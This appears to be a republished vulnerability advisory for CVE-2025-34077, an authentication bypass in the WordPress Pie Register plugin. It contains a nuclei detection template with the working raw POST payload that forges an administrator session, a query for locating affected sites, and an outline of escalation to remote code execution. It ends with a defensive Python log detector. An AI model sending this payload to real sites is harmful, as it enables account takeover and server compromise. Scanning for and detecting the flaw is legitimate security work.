WordPress Pie Register Authentication Bypass Vulnerability

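Vulnerability Information

Vulnerability name: WordPress Pie Register Authentication Bypass Vulnerability

Vulnerability ID:

  • CVE: CVE-2025-34077

Vulnerability type: Authorization bypass

Severity: Critical

Description: Pie Register is a widely used WordPress user-registration plugin that extends the user registration and management features of a WordPress site. It is typically deployed on sites that need user registration, such as membership sites and forums. Because it is so widely deployed, its security matters to many sites. Versions 3.7.1.4 and earlier contain an authentication bypass vulnerability that lets an unauthenticated attacker bypass the authentication mechanism by submitting a crafted POST request to the login endpoint. By setting social_site=true and manipulating the user_id_social_site parameter, the attacker can generate a valid WordPress session cookie for any user ID, including administrators. Once authenticated, the attacker may use the plugin upload functionality to install a malicious plugin containing arbitrary PHP code, leading to remote code execution on the underlying server. The vulnerability exists mainly because the plugin does not properly validate user input when handling authentication requests, which allows the authentication mechanism to be bypassed. Exploitation can lead to full takeover of the site, data disclosure, and even compromise of the server, and because the attacker needs no authentication at all, the risk is greatly increased.

Vendor: WordPress

Product name: Pie Register

Affected versions: <= 3.7.1.4

Search query: /wp-content/plugins/pie-register/

Source: https://github.com/projectdiscovery/nuclei-templates/blob/b9fc3e5b0b74ff6f764085abd74e0fe1f04c9cc1/http%2Fcves%2F2025%2FCVE-2025-34077.yaml

Type: projectdiscovery/nuclei-templates:github issues

PoC details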


id: CVE-2025-34077

info:
  name: WordPress Pie Register <= 3.7.1.4 - Authentication Bypass
  author: kylew1004
  severity: critical
  description: |
    An authentication bypass vulnerability exists in the WordPress Pie Register plugin ≤ 3.7.1.4 that allows unauthenticated attackers to impersonate arbitrary users by submitting a crafted POST request to the login endpoint. By setting social_site=true and manipulating the user_id_social_site parameter, an attacker can generate a valid WordPress session cookie for any user ID, including administrators. Once authenticated, the attacker may exploit plugin upload functionality to install a malicious plugin containing arbitrary PHP code, resulting in remote code execution on the underlying server.
  reference:
    - https://github.com/MrjHaxcore/CVE-2025-34077
    - https://nvd.nist.gov/vuln/detail/CVE-2025-34077
    - https://securityvulnerability.io/vulnerability/CVE-2025-34077
  metadata:
    verified: true
    max-request: 1
    publicwww-query: "/wp-content/plugins/pie-register/"
  tags: cve,cve2025,wordpress,wp-plugin,pie-register,wp,auth-bypass

http:
  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        user_id_social_site=1&social_site=true&piereg_login_after_registration=true&_wp_http_referer=/login/&log=null&pwd=null

    matchers:
      - type: dsl
        dsl:
          - "contains(set_cookie,'wordpress_logged_in_')"
          - "status_code==302"
        condition: and
        internal: true

  - raw:
      - |
        POST /wp-admin/index.php HTTP/1.1
        Host: {{Hostname}}

    redirects: true

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body, "Dashboard","Plugins","Edit Profile")'
        condition: and
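
Detection logic for the request pattern described above, added here as an example (it is not part of the nuclei template or the plugin). It assumes a hypothetical log record format from a WAF or reverse proxy that captures request bodies and response Set-Cookie values; the field names and the sample records are constructed.

```python
from urllib.parse import parse_qs

COOKIE_PREFIX = "wordpress_logged_in_"  # cookie name prefix the template matches on

def classify(record):
    """Return (verdict, targeted_user_id) for one logged request, or None."""
    if record["method"].upper() != "POST":
        return None
    # parse_qs URL-decodes keys and values, so percent-encoded or
    # differently-cased variants are caught where a substring match would miss.
    params = parse_qs(record["body"], keep_blank_values=True)
    flags = [v.strip().lower() for v in params.get("social_site", [])]
    user_ids = params.get("user_id_social_site")
    if "true" not in flags or not user_ids:
        return None
    # Same success condition as the template's first matcher:
    # a 302 response that sets a logged-in cookie.
    issued = (record["status"] == 302
              and COOKIE_PREFIX in record.get("set_cookie", ""))
    return ("session-issued" if issued else "attempt", user_ids[0])

def scan(records):
    """Return (source, verdict, user_id) for every record that matches."""
    findings = []
    for rec in records:
        hit = classify(rec)
        if hit:
            findings.append((rec["src"], *hit))
    return findings

# Constructed sample records; source addresses are documentation ranges.
SAMPLE = [
    {"src": "198.51.100.7", "method": "POST", "path": "/", "status": 302,
     "body": "user_id_social_site=1&social_site=true"
             "&piereg_login_after_registration=true",
     "set_cookie": "wordpress_logged_in_0123abcd=placeholder"},
    {"src": "198.51.100.9", "method": "POST", "path": "/", "status": 200,
     "body": "social%5Fsite=TRUE&user_id_social_site=2", "set_cookie": ""},
    # Ordinary password login: sets the same cookie but must not be flagged.
    {"src": "203.0.113.5", "method": "POST", "path": "/wp-login.php",
     "status": 302, "body": "log=alice&pwd=REDACTED",
     "set_cookie": "wordpress_logged_in_0123abcd=placeholder"},
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

A `session-issued` finding names the user ID whose sessions should be reviewed and revoked; an `attempt` finding means the parameters were submitted but no login cookie was returned.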



http://example.com/2025/07/28/github_210561465/
Author: lianccc
Published: July 28, 2025